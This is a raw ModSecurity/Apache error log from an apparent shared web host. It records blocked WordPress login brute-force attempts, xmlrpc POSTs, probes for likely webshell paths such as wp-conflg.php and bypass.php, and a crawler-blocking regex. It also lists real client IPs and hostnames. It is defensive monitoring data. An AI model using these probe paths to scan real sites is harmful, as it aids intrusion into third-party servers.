[Tue May 26 18:06:56.253843 2026] [security2:error] [pid 960743:tid 960906] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT5_QvEln_BHBy2zKEIgAAAKY"]
[Tue May 26 18:06:56.378366 2026] [security2:error] [pid 960743:tid 960769] [remote 162.240.52.198:37448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWT6PQvEln_BHBy2zKEMwAA9xk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:06:56.427054 2026] [security2:error] [pid 960743:tid 960965] [client 185.192.70.78:51431] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 78.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/classwithtostring.php"] [unique_id "ahWT6PQvEln_BHBy2zKENAAAAOE"]
[Tue May 26 18:06:57.867122 2026] [security2:error] [pid 960743:tid 960970] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT6fQvEln_BHBy2zKEUAAAAOY"]
[Tue May 26 18:06:59.001479 2026] [security2:error] [pid 960743:tid 960962] [client 185.192.70.91:31959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 91.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/blue.php"] [unique_id "ahWT6_QvEln_BHBy2zKEegAAAN4"]
[Tue May 26 18:07:00.045639 2026] [security2:error] [pid 960743:tid 960972] [client 185.192.70.84:65479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/content.php"] [unique_id "ahWT7PQvEln_BHBy2zKEigAAAOg"]
[Tue May 26 18:07:00.640752 2026] [security2:error] [pid 960743:tid 960988] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT7PQvEln_BHBy2zKElQAAAPg"]
[Tue May 26 18:07:00.640907 2026] [security2:error] [pid 960743:tid 960798] [remote 211.23.68.235:9540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWT7PQvEln_BHBy2zKElgAAijY"]
[Tue May 26 18:07:00.967955 2026] [security2:error] [pid 960743:tid 960908] [client 185.192.70.69:61541] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/uploads/about.php"] [unique_id "ahWT7PQvEln_BHBy2zKEnQAAAKg"]
[Tue May 26 18:07:01.860718 2026] [security2:error] [pid 960743:tid 960786] [remote 5.42.158.148:50348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWT7fQvEln_BHBy2zKEtgAApio"]
[Tue May 26 18:07:02.362957 2026] [security2:error] [pid 960743:tid 960886] [client 185.192.70.73:34803] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/wp-login.php"] [unique_id "ahWT7vQvEln_BHBy2zKEvgAAAJI"]
[Tue May 26 18:07:02.414127 2026] [security2:error] [pid 960743:tid 960923] [client 82.76.238.33:53223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWT7vQvEln_BHBy2zKEywAAALc"]
[Tue May 26 18:07:02.414293 2026] [security2:error] [pid 960743:tid 960923] [client 82.76.238.33:53223] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWT7vQvEln_BHBy2zKEywAAALc"]
[Tue May 26 18:07:03.361067 2026] [security2:error] [pid 960743:tid 960776] [remote 5.42.158.148:50348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWT7_QvEln_BHBy2zKE4gAArSA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:07:03.459273 2026] [security2:error] [pid 960743:tid 960790] [remote 159.89.192.15:55524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.192.89.159.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWT7_QvEln_BHBy2zKE3gAA3C4"]
[Tue May 26 18:07:03.566417 2026] [security2:error] [pid 960743:tid 960931] [client 185.192.70.95:59591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-includes/rest-api/endpoints/index.php"] [unique_id "ahWT7_QvEln_BHBy2zKE5wAAAL8"]
[Tue May 26 18:07:04.031462 2026] [security2:error] [pid 960743:tid 960980] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT7_QvEln_BHBy2zKE6gAAAPA"]
[Tue May 26 18:07:04.620818 2026] [security2:error] [pid 960743:tid 960986] [client 185.192.70.84:57637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/languages/about.php"] [unique_id "ahWT8PQvEln_BHBy2zKFAwAAAPY"]
[Tue May 26 18:07:05.102883 2026] [security2:error] [pid 960743:tid 960941] [client 172.98.32.41:28169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 41.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWT8PQvEln_BHBy2zKFDAAAAMk"]
[Tue May 26 18:07:05.762922 2026] [security2:error] [pid 960743:tid 960912] [client 185.192.70.97:63975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/wp-theme-editor/include.php"] [unique_id "ahWT8fQvEln_BHBy2zKFJQAAAKw"]
[Tue May 26 18:07:06.059891 2026] [security2:error] [pid 960743:tid 960937] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT8fQvEln_BHBy2zKFJAAAAMU"]
[Tue May 26 18:07:06.565809 2026] [security2:error] [pid 960743:tid 960966] [client 185.192.70.81:59611] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/up/main.php"] [unique_id "ahWT8vQvEln_BHBy2zKFNgAAAOI"]
[Tue May 26 18:07:07.501802 2026] [security2:error] [pid 960743:tid 960967] [client 114.119.138.36:22891] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahWT8_QvEln_BHBy2zKFTwAAAOM"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2023-10-03
[Tue May 26 18:07:08.635726 2026] [security2:error] [pid 960743:tid 960968] [client 185.192.70.96:62749] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/fonts/fontawesome-webfont.php"] [unique_id "ahWT9PQvEln_BHBy2zKFcAAAAOQ"]
[Tue May 26 18:07:08.707731 2026] [security2:error] [pid 960743:tid 960781] [remote 129.121.76.191:36798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWT9PQvEln_BHBy2zKFaQAAsSU"]
[Tue May 26 18:07:08.948287 2026] [security2:error] [pid 960743:tid 960908] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT9PQvEln_BHBy2zKFaAAAAKg"]
[Tue May 26 18:07:09.914296 2026] [security2:error] [pid 960743:tid 960953] [client 185.192.70.98:64913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/wp-conflg.php"] [unique_id "ahWT9fQvEln_BHBy2zKFlwAAANU"]
[Tue May 26 18:07:09.972847 2026] [security2:error] [pid 960743:tid 960813] [remote 129.121.76.191:36798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 191.76.121.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWT9fQvEln_BHBy2zKFmAAAi0U"], referer: https://soto-plumbing.com/wp-login.php
[Tue May 26 18:07:11.623768 2026] [security2:error] [pid 960743:tid 960971] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT9_QvEln_BHBy2zKFtQAAAOc"]
[Tue May 26 18:07:11.985354 2026] [security2:error] [pid 960743:tid 960969] [client 223.109.211.197:5313] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWT9_QvEln_BHBy2zKFyAAAAOU"]
[Tue May 26 18:07:11.985494 2026] [security2:error] [pid 960743:tid 960969] [client 223.109.211.197:5313] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWT9_QvEln_BHBy2zKFyAAAAOU"]
[Tue May 26 18:07:11.990361 2026] [security2:error] [pid 960743:tid 960955] [client 185.192.70.81:55651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/includes/about.php"] [unique_id "ahWT9_QvEln_BHBy2zKFyQAAANc"]
[Tue May 26 18:07:12.142780 2026] [security2:error] [pid 960743:tid 960973] [client 45.79.207.181:46751] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cuatrodoce.com.mx"] [uri "/index.php"] [unique_id "ahWT-PQvEln_BHBy2zKFygAAAOk"]
[Tue May 26 18:07:12.701933 2026] [security2:error] [pid 960743:tid 960953] [client 45.79.128.205:33472] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWT-PQvEln_BHBy2zKF1AAAANU"]
[Tue May 26 18:07:12.746108 2026] [security2:error] [pid 960743:tid 960991] [client 82.76.238.33:53866] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWT-PQvEln_BHBy2zKF3wAAAPs"]
[Tue May 26 18:07:12.746233 2026] [security2:error] [pid 960743:tid 960991] [client 82.76.238.33:53866] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWT-PQvEln_BHBy2zKF3wAAAPs"]
[Tue May 26 18:07:13.340182 2026] [security2:error] [pid 960743:tid 960980] [client 185.192.70.73:45241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/blue/index.php"] [unique_id "ahWT-fQvEln_BHBy2zKF7AAAAPA"]
[Tue May 26 18:07:14.179290 2026] [security2:error] [pid 960743:tid 960895] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT-fQvEln_BHBy2zKF9QAAAJs"]
[Tue May 26 18:07:15.065366 2026] [autoindex:error] [pid 960743:tid 960903] [client 43.138.68.113:38538] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:07:15.861533 2026] [security2:error] [pid 960743:tid 960933] [client 185.192.70.97:43647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/images/images/about.php"] [unique_id "ahWT-_QvEln_BHBy2zKGKQAAAME"]
[Tue May 26 18:07:16.449369 2026] [security2:error] [pid 960743:tid 960966] [client 114.119.154.82:23189] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "amdsi.org.in"] [uri "/amdsi-regalia.php"] [unique_id "ahWT_PQvEln_BHBy2zKGOQAAAOI"], referer: http://amdsi.org.in/
[Tue May 26 18:07:16.761843 2026] [security2:error] [pid 960743:tid 960974] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT_PQvEln_BHBy2zKGNQAAAOo"]
[Tue May 26 18:07:16.767585 2026] [security2:error] [pid 960743:tid 960886] [client 185.192.70.85:28907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 85.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/images/class.php"] [unique_id "ahWT_PQvEln_BHBy2zKGSwAAAJI"]
[Tue May 26 18:07:17.732178 2026] [security2:error] [pid 960743:tid 960874] [client 185.192.70.72:55333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/plugins/autoload_classmap.php"] [unique_id "ahWT_fQvEln_BHBy2zKGYQAAAIY"]
[Tue May 26 18:07:18.459684 2026] [security2:error] [pid 960743:tid 960796] [remote 209.42.19.17:42860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWT_vQvEln_BHBy2zKGcQABATQ"]
[Tue May 26 18:07:19.000743 2026] [security2:error] [pid 960743:tid 960930] [client 185.192.70.69:48495] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/web.php"] [unique_id "ahWT_vQvEln_BHBy2zKGggAAAL4"]
[Tue May 26 18:07:19.142563 2026] [security2:error] [pid 960743:tid 960859] [remote 195.250.23.247:53122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWT_vQvEln_BHBy2zKGfwAAzXM"]
[Tue May 26 18:07:19.422689 2026] [security2:error] [pid 960743:tid 960967] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWT__QvEln_BHBy2zKGhAAAAOM"]
[Tue May 26 18:07:19.874839 2026] [security2:error] [pid 960743:tid 960860] [remote 74.7.241.58:46212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWT__QvEln_BHBy2zKGnAAAvXQ"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 18:07:20.288450 2026] [security2:error] [pid 960743:tid 960938] [client 185.192.70.90:52325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-admin/css/colors/ocean/about.php"] [unique_id "ahWUAPQvEln_BHBy2zKGowAAAMY"]
[Tue May 26 18:07:20.769449 2026] [security2:error] [pid 960743:tid 960865] [remote 31.24.155.180:43402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWUAPQvEln_BHBy2zKGrAAAwnk"]
[Tue May 26 18:07:20.908960 2026] [security2:error] [pid 960743:tid 960997] [client 172.70.242.197:14145] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "lagoslawntennisclub1895.com"] [uri "/wp-admin/install.php"] [unique_id "ahWUAPQvEln_BHBy2zKGsQAAAQE"]
[Tue May 26 18:07:21.220952 2026] [security2:error] [pid 960743:tid 960932] [client 185.192.70.75:61603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/images/index.php"] [unique_id "ahWUAfQvEln_BHBy2zKGvgAAAMA"]
[Tue May 26 18:07:21.418983 2026] [security2:error] [pid 960743:tid 960862] [remote 31.24.155.180:43402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWUAfQvEln_BHBy2zKGxQAAt3Y"], referer: https://bloggertarget.com/wp-login.php
[Tue May 26 18:07:21.677562 2026] [security2:error] [pid 960743:tid 960966] [client 62.244.225.226:55404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWUAfQvEln_BHBy2zKGxwAAAOI"]
[Tue May 26 18:07:22.134793 2026] [security2:error] [pid 960743:tid 960992] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUAfQvEln_BHBy2zKG0QAAAPw"]
[Tue May 26 18:07:22.606940 2026] [security2:error] [pid 960743:tid 960955] [client 185.192.70.69:56125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 69.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/wp-content/bypass.php"] [unique_id "ahWUAvQvEln_BHBy2zKG5gAAANc"]
[Tue May 26 18:07:23.286431 2026] [security2:error] [pid 960743:tid 960960] [client 82.76.238.33:54341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUA_QvEln_BHBy2zKG-gAAANw"]
[Tue May 26 18:07:23.286540 2026] [security2:error] [pid 960743:tid 960960] [client 82.76.238.33:54341] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUA_QvEln_BHBy2zKG-gAAANw"]
